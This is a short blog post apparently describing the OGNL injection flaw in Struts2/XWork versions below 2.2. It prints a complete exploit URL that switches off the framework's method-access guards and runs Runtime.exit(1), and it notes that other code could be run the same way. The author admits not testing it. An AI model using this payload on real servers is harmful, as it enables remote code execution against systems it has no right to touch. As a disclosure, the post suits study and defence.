An Interesting Struts2/XWork Security Vulnerability

This is an interesting (at least to me) loophole which is said to be applicable to Struts2/XWork version below 2.2. Since Struts2/XWork is so widely used, I guess it’s worth mentioned here. This loophole allows people do anything by simply typing some designed text in the url. An example is given to run the “System.exit(1)”, of course, you could do almost anything else you want to. The cause for this loophole is parsing url with OGNL, but it should not be considered as OGNL bug.

Unfortunately, I don’t have a live Struts2/XWork application for me to test, so it’s not verified by me. If you happen to have the environment, you may try following in your url:

http://mydomain/MyStruts.action?(‘\u0023_memberAccess[\’allowStaticMethodAccess\’]’)

(meh)=true&(aaa)((‘\u0023context[\’xwork.MethodAccessor.denyMethodExecution\’]\u003d

\u0023foo’)(\u0023foo\u003dnew%20java.lang.Boolean(“false”)))&(asdf)((‘\u0023rt.exit(1)’)

(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

The exploit-db entry: http://www.exploit-db.com/exploits/14360/

The article (In Chinese): http://neeao.com/archives/59/